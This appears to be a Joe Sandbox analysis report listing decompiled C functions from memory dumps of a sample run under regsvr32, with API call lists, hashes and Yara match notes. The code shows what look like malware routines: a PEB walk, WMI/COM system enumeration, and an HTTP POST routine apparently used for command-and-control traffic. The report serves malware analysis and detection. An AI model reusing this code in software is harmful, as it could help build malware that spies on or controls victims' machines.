                            • Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                            • Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
                            • Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                            • Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E10005E96() {
                            				intOrPtr _t3;
                            
                            				_t3 =  *0x1001e684; // 0x19afaa0
                            				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
                            				ExitProcess(0);
                            			}





                            APIs
                            • ExitProcess.KERNEL32(00000000), ref: 10005EAD
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                            • Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
                            • Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                            • Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E100085EF() {
                            				void* _t1;
                            
                            				_t1 = HeapCreate(0, 0x80000, 0); // executed
                            				 *0x1001e768 = _t1;
                            				return _t1;
                            			}





                            APIs
                            • HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                            • Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
                            • Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                            • Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            C-Code - Quality: 60%
                            			E00784495(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
                            				signed int _v8;
                            				signed int _t62;
                            				signed int _t67;
                            				signed int _t68;
                            				signed int _t70;
                            				signed int _t72;
                            				signed int _t74;
                            				signed int _t80;
                            				signed int _t84;
                            				signed int _t91;
                            				signed int _t102;
                            				signed int _t104;
                            				signed int _t114;
                            				signed int _t116;
                            				void* _t121;
                            				void* _t143;
                            				signed int* _t147;
                            
                            				_push(__ecx);
                            				_push(__edx);
                            				_push(__edi);
                            				_push(__esi);
                            				if( *((intOrPtr*)(__ebx + 0x435571)) != 1) {
                            					_v8 = __esi;
                            					_t114 = __edi & 0x00000000 ^ (__esi & 0x00000000 |  *(__ebx + 0x43574e));
                            					_push(__edx);
                            					_t62 = __eax & 0x00000000 | __edx & 0x00000000 |  *(_t114 + 0x3c);
                            					_pop(_t102);
                            					_t116 =  *((intOrPtr*)(_t62 + _t114 + 0x28)) +  *(__ebx + 0x4350b0);
                            					_v8 = __ecx;
                            					_t104 = _t102 & 0x00000000 ^ (__ecx ^ _v8 | _t116);
                            					_t84 = _v8;
                            					_v8 = _t84;
                            					_t118 = _t116 & 0x00000000 | _t84 ^ _v8 |  *(__ebx + 0x4350b0);
                            					_push(_t143);
                            					_v8 = __ebx;
                            					_t80 = _v8;
                            					_v8 =  *((intOrPtr*)((_t62 & 0x00000000 ^ (_t143 -  *_t147 |  *((_t116 & 0x00000000 | _t84 ^ _v8 |  *(__ebx + 0x4350b0)) + 0x3c))) + _t118 + 0x28)) +  *(__ebx + 0x4350b0);
                            					_t67 = 0 ^  *( *((intOrPtr*)((_v8 & 0x00000000 | __ebx & 0x00000000 |  *[fs:0x30]) + 0xc)) + 0xc);
                            					__eflags = _t67;
                            					_t91 = _t67;
                            					_t68 = _v8;
                            					while(1) {
                            						 *_t35 =  *((intOrPtr*)(_t91 + 0x1c));
                            						_push(_v8);
                            						_pop(_t121);
                            						__eflags = _t68 - _t121;
                            						if(_t68 == _t121) {
                            							break;
                            						}
                            						__eflags = _t104 - _t121;
                            						if(__eflags != 0) {
                            							_t91 =  *(_t91 + 4);
                            							if(__eflags != 0) {
                            								continue;
                            							} else {
                            								 *((intOrPtr*)(_t80 + 0x435571)) = 1;
                            								_pop( *_t52);
                            								_pop( *_t54);
                            								_pop( *_t56);
                            								_t70 =  *_t147;
                            								__eflags = _t70;
                            								return _t70;
                            							}
                            						} else {
                            							_pop( *_t44);
                            							_pop( *_t46);
                            							_t72 = (_t68 & 0x00000000) + _v8;
                            							__eflags = _t72;
                            							return _t72;
                            						}
                            						goto L9;
                            					}
                            					 *_t37 = _t104;
                            					_push(_v8);
                            					_pop( *_t39);
                            					_pop( *_t40);
                            					_t74 = _t68 & 0x00000000 | _v8;
                            					__eflags = _t74;
                            					return _t74;
                            				} else {
                            					_pop( *_t2);
                            					_pop( *_t4);
                            					return (__eax & 0x00000000) + _t147[1];
                            				}
                            				L9:
                            			}





















                            Memory Dump Source
                            • Source File: 0000000D.00000002.622781002.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_780000_regsvr32.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0479555227218ebb414e8c4145d25bc2b41eb189c0fbb9efb8d710e990c1ccf4
                            • Instruction ID: 79efaf66f0995a7c49e2e57df582f5de50c85a1e2f0d7bce4a023dbd1b3a5b5d
                            • Opcode Fuzzy Hash: 0479555227218ebb414e8c4145d25bc2b41eb189c0fbb9efb8d710e990c1ccf4
                            • Instruction Fuzzy Hash: 88512A77D11508EBEB04CF94DA4279DB7B2FF94324F2981A9C845A7280C734AF20EB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				char _v24;
                            				void* _v28;
                            				signed int _v32;
                            				char _v36;
                            				intOrPtr _v40;
                            				signed int _v44;
                            				char _v48;
                            				char _v52;
                            				intOrPtr _v56;
                            				signed int _v60;
                            				char* _v72;
                            				signed short _v80;
                            				signed int _v84;
                            				char _v88;
                            				char _v92;
                            				char _v96;
                            				intOrPtr _v100;
                            				char _v104;
                            				char _v616;
                            				intOrPtr* _t159;
                            				char _t165;
                            				signed int _t166;
                            				signed int _t173;
                            				signed int _t178;
                            				signed int _t186;
                            				intOrPtr* _t187;
                            				signed int _t188;
                            				signed int _t192;
                            				intOrPtr* _t193;
                            				intOrPtr _t200;
                            				intOrPtr* _t205;
                            				signed int _t207;
                            				signed int _t209;
                            				intOrPtr* _t210;
                            				intOrPtr _t212;
                            				intOrPtr* _t213;
                            				signed int _t214;
                            				char _t217;
                            				signed int _t218;
                            				signed int _t219;
                            				signed int _t230;
                            				signed int _t235;
                            				signed int _t242;
                            				signed int _t243;
                            				signed int _t244;
                            				signed int _t245;
                            				intOrPtr* _t247;
                            				intOrPtr* _t251;
                            				signed int _t252;
                            				intOrPtr* _t253;
                            				void* _t255;
                            				intOrPtr* _t261;
                            				signed int _t262;
                            				signed int _t283;
                            				signed int _t289;
                            				char* _t298;
                            				void* _t320;
                            				signed int _t322;
                            				intOrPtr* _t323;
                            				intOrPtr _t324;
                            				signed int _t327;
                            				intOrPtr* _t328;
                            				intOrPtr* _t329;
                            
                            				_v32 = _v32 & 0x00000000;
                            				_v60 = _v60 & 0x00000000;
                            				_v56 = __edx;
                            				_v100 = __ecx;
                            				_t159 = E1000D523(__ecx);
                            				_t251 = _t159;
                            				_v104 = _t251;
                            				if(_t251 == 0) {
                            					return _t159;
                            				}
                            				_t320 = E10008604(0x10);
                            				_v36 = _t320;
                            				_pop(_t255);
                            				if(_t320 == 0) {
                            					L53:
                            					E1000861A( &_v60, 0xfffffffe);
                            					E1000D5D7( &_v104);
                            					return _t320;
                            				}
                            				_t165 = E100095E1(_t255, 0x536);
                            				 *_t328 = 0x609;
                            				_v52 = _t165;
                            				_t166 = E100095E1(_t255);
                            				_push(0);
                            				_push(_v56);
                            				_v20 = _t166;
                            				_push(_t166);
                            				_push(_a4);
                            				_t322 = E100092E5(_t165);
                            				_v60 = _t322;
                            				E100085D5( &_v52);
                            				E100085D5( &_v20);
                            				_t329 = _t328 + 0x20;
                            				if(_t322 != 0) {
                            					_t323 = __imp__#2;
                            					_v40 =  *_t323(_t322);
                            					_t173 = E100095E1(_t255, 0x9e4);
                            					_v20 = _t173;
                            					_v52 =  *_t323(_t173);
                            					E100085D5( &_v20);
                            					_t324 = _v40;
                            					_t261 =  *_t251;
                            					_t252 = 0;
                            					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                            					__eflags = _t178;
                            					if(_t178 != 0) {
                            						L52:
                            						__imp__#6(_t324);
                            						__imp__#6(_v52);
                            						goto L53;
                            					}
                            					_t262 = _v32;
                            					_v28 = 0;
                            					_v20 = 0;
                            					__eflags = _t262;
                            					if(_t262 == 0) {
                            						L49:
                            						 *((intOrPtr*)( *_t262 + 8))(_t262);
                            						__eflags = _t252;
                            						if(_t252 == 0) {
                            							E1000861A( &_v36, 0);
                            							_t320 = _v36;
                            						} else {
                            							 *(_t320 + 8) = _t252;
                            							 *_t320 = E100091E3(_v100);
                            							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
                            						}
                            						goto L52;
                            					} else {
                            						goto L6;
                            					}
                            					while(1) {
                            						L6:
                            						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                            						__eflags = _t186;
                            						if(_t186 != 0) {
                            							break;
                            						}
                            						_v16 = 0;
                            						_v48 = 0;
                            						_v12 = 0;
                            						_v24 = 0;
                            						__eflags = _v84;
                            						if(_v84 == 0) {
                            							break;
                            						}
                            						_t187 = _v28;
                            						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                            						__eflags = _t188;
                            						if(_t188 >= 0) {
                            							__imp__#20(_v24, 1,  &_v16);
                            							__imp__#19(_v24, 1,  &_v48);
                            							_t46 = _t320 + 0xc; // 0xc
                            							_t253 = _t46;
                            							_t327 = _t252 << 3;
                            							_t47 = _t327 + 8; // 0x8
                            							_t192 = E10008698(_t327, _t47);
                            							__eflags = _t192;
                            							if(_t192 == 0) {
                            								__imp__#16(_v24);
                            								_t193 = _v28;
                            								 *((intOrPtr*)( *_t193 + 8))(_t193);
                            								L46:
                            								_t252 = _v20;
                            								break;
                            							}
                            							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                            							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
                            							_t200 =  *_t253;
                            							__eflags =  *(_t327 + _t200 + 4);
                            							if( *(_t327 + _t200 + 4) == 0) {
                            								_t136 = _t320 + 0xc; // 0xc
                            								E1000861A(_t136, 0);
                            								E1000861A( &_v36, 0);
                            								__imp__#16(_v24);
                            								_t205 = _v28;
                            								 *((intOrPtr*)( *_t205 + 8))(_t205);
                            								_t320 = _v36;
                            								goto L46;
                            							}
                            							_t207 = _v16;
                            							while(1) {
                            								_v12 = _t207;
                            								__eflags = _t207 - _v48;
                            								if(_t207 > _v48) {
                            									break;
                            								}
                            								_v44 = _v44 & 0x00000000;
                            								_t209 =  &_v12;
                            								__imp__#25(_v24, _t209,  &_v44);
                            								__eflags = _t209;
                            								if(_t209 < 0) {
                            									break;
                            								}
                            								_t212 = E100091E3(_v44);
                            								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                            								_t213 = _v28;
                            								_t281 =  *_t213;
                            								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                            								__eflags = _t214;
                            								if(_t214 < 0) {
                            									L39:
                            									__imp__#6(_v44);
                            									_t207 = _v12 + 1;
                            									__eflags = _t207;
                            									continue;
                            								}
                            								_v92 = E100095E1(_t281, 0x250);
                            								 *_t329 = 0x4cc;
                            								_t217 = E100095E1(_t281);
                            								_t283 = _v80;
                            								_v96 = _t217;
                            								_t218 = _t283 & 0x0000ffff;
                            								__eflags = _t218 - 0xb;
                            								if(__eflags > 0) {
                            									_t219 = _t218 - 0x10;
                            									__eflags = _t219;
                            									if(_t219 == 0) {
                            										L35:
                            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
                            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                            										__eflags = _t289;
                            										if(_t289 == 0) {
                            											L38:
                            											E100085D5( &_v92);
                            											E100085D5( &_v96);
                            											__imp__#9( &_v80);
                            											goto L39;
                            										}
                            										_push(_v72);
                            										_push(L"%d");
                            										L37:
                            										_push(0xc);
                            										_push(_t289);
                            										E10009640();
                            										_t329 = _t329 + 0x10;
                            										goto L38;
                            									}
                            									_t230 = _t219 - 1;
                            									__eflags = _t230;
                            									if(_t230 == 0) {
                            										L33:
                            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
                            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                            										__eflags = _t289;
                            										if(_t289 == 0) {
                            											goto L38;
                            										}
                            										_push(_v72);
                            										_push(L"%u");
                            										goto L37;
                            									}
                            									_t235 = _t230 - 1;
                            									__eflags = _t235;
                            									if(_t235 == 0) {
                            										goto L33;
                            									}
                            									__eflags = _t235 == 1;
                            									if(_t235 == 1) {
                            										goto L33;
                            									}
                            									L28:
                            									__eflags = _t283 & 0x00002000;
                            									if((_t283 & 0x00002000) == 0) {
                            										_v88 = E100095E1(_t283, 0x219);
                            										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                            										E100085D5( &_v88);
                            										_t329 = _t329 + 0x18;
                            										_t298 =  &_v616;
                            										L31:
                            										_t242 = E100091E3(_t298);
                            										L32:
                            										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                            										goto L38;
                            									}
                            									_t242 = E1000DA20( &_v80);
                            									goto L32;
                            								}
                            								if(__eflags == 0) {
                            									__eflags = _v72 - 0xffff;
                            									_t298 = L"TRUE";
                            									if(_v72 != 0xffff) {
                            										_t298 = L"FALSE";
                            									}
                            									goto L31;
                            								}
                            								_t243 = _t218 - 1;
                            								__eflags = _t243;
                            								if(_t243 == 0) {
                            									goto L38;
                            								}
                            								_t244 = _t243 - 1;
                            								__eflags = _t244;
                            								if(_t244 == 0) {
                            									goto L35;
                            								}
                            								_t245 = _t244 - 1;
                            								__eflags = _t245;
                            								if(_t245 == 0) {
                            									goto L35;
                            								}
                            								__eflags = _t245 != 5;
                            								if(_t245 != 5) {
                            									goto L28;
                            								}
                            								_t298 = _v72;
                            								goto L31;
                            							}
                            							__imp__#16(_v24);
                            							_t210 = _v28;
                            							 *((intOrPtr*)( *_t210 + 8))(_t210);
                            							_t252 = _v20;
                            							L42:
                            							_t262 = _v32;
                            							_t252 = _t252 + 1;
                            							_v20 = _t252;
                            							__eflags = _t262;
                            							if(_t262 != 0) {
                            								continue;
                            							}
                            							L48:
                            							_t324 = _v40;
                            							goto L49;
                            						}
                            						_t247 = _v28;
                            						 *((intOrPtr*)( *_t247 + 8))(_t247);
                            						goto L42;
                            					}
                            					_t262 = _v32;
                            					goto L48;
                            				} else {
                            					E1000861A( &_v36, _t322);
                            					_t320 = _v36;
                            					goto L53;
                            				}
                            			}

                            APIs
                              • Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                              • Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                              • Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                              • Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
                              • Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            • SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
                            • SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
                            • SysFreeString.OLEAUT32(?), ref: 1000DF82
                            • SysFreeString.OLEAUT32(?), ref: 1000DF8B
                              • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
                            • String ID: FALSE$TRUE
                            • API String ID: 224402418-1412513891
                            • Opcode ID: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                            • Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
                            • Opcode Fuzzy Hash: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                            • Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                            				char _v8;
                            				char _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				char _v24;
                            				intOrPtr _v28;
                            				char _v32;
                            				intOrPtr _v36;
                            				signed int _v40;
                            				signed int _v44;
                            				intOrPtr _v48;
                            				intOrPtr _v52;
                            				intOrPtr _v56;
                            				intOrPtr _v60;
                            				char _v64;
                            				int _v76;
                            				void* _v80;
                            				intOrPtr _v100;
                            				int _v104;
                            				void* _v108;
                            				intOrPtr _v112;
                            				intOrPtr _v116;
                            				char* _v120;
                            				void _v124;
                            				char _v140;
                            				void _v396;
                            				void _v652;
                            				intOrPtr _t105;
                            				intOrPtr _t113;
                            				intOrPtr* _t115;
                            				intOrPtr _t118;
                            				intOrPtr _t121;
                            				intOrPtr _t124;
                            				intOrPtr _t127;
                            				intOrPtr _t131;
                            				char _t133;
                            				intOrPtr _t136;
                            				char _t138;
                            				char _t139;
                            				intOrPtr _t141;
                            				intOrPtr _t147;
                            				intOrPtr _t154;
                            				intOrPtr _t158;
                            				intOrPtr _t162;
                            				intOrPtr _t164;
                            				intOrPtr _t166;
                            				intOrPtr _t172;
                            				intOrPtr _t176;
                            				void* _t183;
                            				void* _t185;
                            				intOrPtr _t186;
                            				char _t195;
                            				intOrPtr _t203;
                            				intOrPtr _t204;
                            				signed int _t209;
                            				void _t212;
                            				intOrPtr _t213;
                            				void* _t214;
                            				intOrPtr _t216;
                            				char _t217;
                            				intOrPtr _t218;
                            				signed int _t219;
                            				signed int _t220;
                            				void* _t221;
                            
                            				_v40 = _v40 & 0x00000000;
                            				_v24 = 4;
                            				_v36 = 1;
                            				_t214 = __edx;
                            				memset( &_v396, 0, 0x100);
                            				memset( &_v652, 0, 0x100);
                            				_v64 = E100095C7(0x85b);
                            				_v60 = E100095C7(0xdc9);
                            				_v56 = E100095C7(0x65d);
                            				_v52 = E100095C7(0xdd3);
                            				_t105 = E100095C7(0xb74);
                            				_v44 = _v44 & 0;
                            				_t212 = 0x3c;
                            				_v48 = _t105;
                            				memset( &_v124, 0, 0x100);
                            				_v116 = 0x10;
                            				_v120 =  &_v140;
                            				_v124 = _t212;
                            				_v108 =  &_v396;
                            				_v104 = 0x100;
                            				_v80 =  &_v652;
                            				_push( &_v124);
                            				_push(0);
                            				_v76 = 0x100;
                            				_push(E1000C379(_t214));
                            				_t113 =  *0x1001e6a4; // 0x0
                            				_push(_t214);
                            				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                            					_t209 = 0;
                            					_v20 = 0;
                            					do {
                            						_t115 =  *0x1001e6a4; // 0x0
                            						_v12 = 0x8404f700;
                            						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                            						if(_t213 != 0) {
                            							_t195 = 3;
                            							_t185 = 4;
                            							_v8 = _t195;
                            							_t118 =  *0x1001e6a4; // 0x0
                            							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                            							_v8 = 0x3a98;
                            							_t121 =  *0x1001e6a4; // 0x0
                            							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                            							_v8 = 0x493e0;
                            							_t124 =  *0x1001e6a4; // 0x0
                            							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                            							_v8 = 0x493e0;
                            							_t127 =  *0x1001e6a4; // 0x0
                            							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                            							_t131 =  *0x1001e6a4; // 0x0
                            							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                            							if(_a24 != 0) {
                            								E1000980C(_a24);
                            							}
                            							if(_t186 != 0) {
                            								_t133 = 0x8484f700;
                            								if(_v112 != 4) {
                            									_t133 = _v12;
                            								}
                            								_t136 =  *0x1001e6a4; // 0x0
                            								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                            								_v8 = _t216;
                            								if(_a24 != 0) {
                            									E1000980C(_a24);
                            								}
                            								if(_t216 != 0) {
                            									_t138 = 4;
                            									if(_v112 != _t138) {
                            										L19:
                            										_t139 = E100095C7(0x777);
                            										_t217 = _t139;
                            										_v12 = _t217;
                            										_t141 =  *0x1001e6a4; // 0x0
                            										_t218 = _v8;
                            										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
                            										E100085C2( &_v12);
                            										if(_a24 != 0) {
                            											E1000980C(_a24);
                            										}
                            										if(_v28 != 0) {
                            											L28:
                            											_v24 = 8;
                            											_push(0);
                            											_v32 = 0;
                            											_v28 = 0;
                            											_push( &_v24);
                            											_push( &_v32);
                            											_t147 =  *0x1001e6a4; // 0x0
                            											_push(0x13);
                            											_push(_t218);
                            											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                            												_t219 = E10009749( &_v32);
                            												if(_t219 == 0xc8) {
                            													 *_a20 = _v8;
                            													 *_a12 = _t213;
                            													 *_a16 = _t186;
                            													return 0;
                            												}
                            												_t220 =  ~_t219;
                            												L32:
                            												_t154 =  *0x1001e6a4; // 0x0
                            												 *((intOrPtr*)(_t154 + 8))(_v8);
                            												L33:
                            												if(_t186 != 0) {
                            													_t158 =  *0x1001e6a4; // 0x0
                            													 *((intOrPtr*)(_t158 + 8))(_t186);
                            												}
                            												if(_t213 != 0) {
                            													_t203 =  *0x1001e6a4; // 0x0
                            													 *((intOrPtr*)(_t203 + 8))(_t213);
                            												}
                            												return _t220;
                            											}
                            											GetLastError();
                            											_t220 = 0xfffffff8;
                            											goto L32;
                            										} else {
                            											GetLastError();
                            											_t162 =  *0x1001e6a4; // 0x0
                            											 *((intOrPtr*)(_t162 + 8))(_t218);
                            											_t218 = 0;
                            											goto L23;
                            										}
                            									}
                            									_v12 = _t138;
                            									_push( &_v12);
                            									_push( &_v16);
                            									_t172 =  *0x1001e6a4; // 0x0
                            									_push(0x1f);
                            									_push(_t216);
                            									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                            										L18:
                            										GetLastError();
                            										goto L19;
                            									}
                            									_v16 = _v16 | 0x00003380;
                            									_push(4);
                            									_push( &_v16);
                            									_t176 =  *0x1001e6a4; // 0x0
                            									_push(0x1f);
                            									_push(_t216);
                            									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                            										goto L19;
                            									}
                            									goto L18;
                            								} else {
                            									GetLastError();
                            									L23:
                            									_t164 =  *0x1001e6a4; // 0x0
                            									 *((intOrPtr*)(_t164 + 8))(_t186);
                            									_t186 = 0;
                            									goto L24;
                            								}
                            							} else {
                            								GetLastError();
                            								L24:
                            								_t166 =  *0x1001e6a4; // 0x0
                            								 *((intOrPtr*)(_t166 + 8))(_t213);
                            								_t213 = 0;
                            								goto L25;
                            							}
                            						}
                            						GetLastError();
                            						L25:
                            						_t204 = _t218;
                            						_t209 = _v20 + 1;
                            						_v20 = _t209;
                            					} while (_t209 < 2);
                            					_v8 = _t218;
                            					if(_t204 != 0) {
                            						goto L28;
                            					}
                            					_t220 = 0xfffffffe;
                            					goto L33;
                            				}
                            				_t183 = 0xfffffffc;
                            				return _t183;
                            			}




































































                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$ErrorLast
                            • String ID: POST
                            • API String ID: 2570506013-1814004025
                            • Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                            • Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
                            • Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                            • Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 28%
                            			E100116B8(signed int* _a4) {
                            				char _v8;
                            				_Unknown_base(*)()* _v12;
                            				_Unknown_base(*)()* _v16;
                            				char _v20;
                            				_Unknown_base(*)()* _t16;
                            				_Unknown_base(*)()* _t17;
                            				void* _t22;
                            				intOrPtr* _t28;
                            				signed int _t29;
                            				signed int _t30;
                            				struct HINSTANCE__* _t32;
                            				void* _t34;
                            
                            				_t30 = 0;
                            				_v8 = 0;
                            				_t32 = GetModuleHandleA("advapi32.dll");
                            				if(_t32 == 0) {
                            					L9:
                            					return 1;
                            				}
                            				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                            				_v12 = _t16;
                            				if(_t16 == 0) {
                            					goto L9;
                            				}
                            				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                            				_v16 = _t17;
                            				if(_t17 == 0) {
                            					goto L9;
                            				}
                            				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                            				if(_t28 == 0) {
                            					goto L9;
                            				}
                            				_push(0xf0000000);
                            				_push(1);
                            				_push(0);
                            				_push(0);
                            				_push( &_v8);
                            				if(_v12() == 0) {
                            					goto L9;
                            				}
                            				_t22 = _v16(_v8, 4,  &_v20);
                            				 *_t28(_v8, 0);
                            				if(_t22 == 0) {
                            					goto L9;
                            				}
                            				_t29 = 0;
                            				do {
                            					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                            					_t29 = _t29 + 1;
                            				} while (_t29 < 4);
                            				 *_a4 = _t30;
                            				return 0;
                            			}


                            APIs
                            • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
                            • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
